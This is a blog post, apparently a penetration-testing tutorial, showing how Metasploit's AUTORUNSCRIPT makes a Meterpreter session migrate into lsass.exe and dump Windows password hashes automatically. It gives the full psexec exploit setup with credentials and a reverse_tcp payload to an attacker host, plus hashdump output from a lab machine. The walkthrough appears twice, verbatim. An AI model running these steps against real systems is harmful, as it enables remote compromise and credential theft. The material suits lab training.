Saturday, July 6, 2019

Automation with AutoRunScript - Meterpreter - Metasploitalble



During a penetration test, you want to automate as much as possible so you can focus on actions that require human interaction. To ease our task, Metasploit allows you to specify what happens after you receive a new Meterperter session using AUTORUNSCRIPT









How to do it...
First, we need to create a file with the commands we want to execute. In this example, we will migrate to the lsass.exe process and dump the Windows hashes:





root@kali:~# cat autoruncmds.rc
migrate -N lsass.exe
hashdump
Next, we will use the exploit/windows/smb/psexec exploit module to compromise the target and use AUTORUNSCRIPT to specify the command we want to execute as soon as we receive a new session:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.216.10
RHOST => 192.168.216.10
msf exploit(psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf exploit(psexec) > set SMBPASS vagrant
SMBPASS => vagrant
msf exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf exploit(psexec) > set AUTORUNSCRIPT multi_console_command -r /root/autoruncmds.rc
AUTORUNSCRIPT => multi_console_command -r /root/autoruncmds.rc
msf exploit(psexec) >
By setting AUTORUNSCRIPT, we can automatically run scripts on session creation. In this example, we will use the multi_console_command script, which allows us to specify multiple commands to run. Use -c followed by the commands to execute, enclosed in double quotes and separated by a comma, or as in our example, use -r and the path to a text file with a list of commands, one per line. Now that we have everything ready, we just need to use the exploit command to launch the attack:
meterpreter >
[*] Session ID 1 (192.168.216.5:4444 -> 192.168.216.10:49665) processing AutoRunScript 'multi_console_command -r /root/autoruncmds.rc'
[*] Running Command List ...
[*] Running command migrate -N lsass.exe
[*] Migrating from 576 to 456...
[*] Migration completed successfully.
[*] Running command hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
...
Awesome! Looking at the output, we were able to get a new session, migrate to the lsass.exe process, and dump the Windows hashes without any interaction.


How to do it...
First, we need to create a file with the commands we want to execute. In this example, we will migrate to the lsass.exe process and dump the Windows hashes:
root@kali:~# cat autoruncmds.rc
migrate -N lsass.exe
hashdump
Next, we will use the exploit/windows/smb/psexec exploit module to compromise the target and use AUTORUNSCRIPT to specify the command we want to execute as soon as we receive a new session:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.216.10
RHOST => 192.168.216.10
msf exploit(psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf exploit(psexec) > set SMBPASS vagrant
SMBPASS => vagrant
msf exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf exploit(psexec) > set AUTORUNSCRIPT multi_console_command -r /root/autoruncmds.rc
AUTORUNSCRIPT => multi_console_command -r /root/autoruncmds.rc
msf exploit(psexec) >
By setting AUTORUNSCRIPT, we can automatically run scripts on session creation. In this example, we will use the multi_console_command script, which allows us to specify multiple commands to run. Use -c followed by the commands to execute, enclosed in double quotes and separated by a comma, or as in our example, use -r and the path to a text file with a list of commands, one per line. Now that we have everything ready, we just need to use the exploit command to launch the attack:
meterpreter >
[*] Session ID 1 (192.168.216.5:4444 -> 192.168.216.10:49665) processing AutoRunScript 'multi_console_command -r /root/autoruncmds.rc'
[*] Running Command List ...
[*] Running command migrate -N lsass.exe
[*] Migrating from 576 to 456...
[*] Migration completed successfully.
[*] Running command hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
...
Awesome! Looking at the output, we were able to get a new session, migrate to the lsass.exe process, and dump the Windows hashes without any interaction.

No comments:

Post a Comment

Remote Hybrid and Office work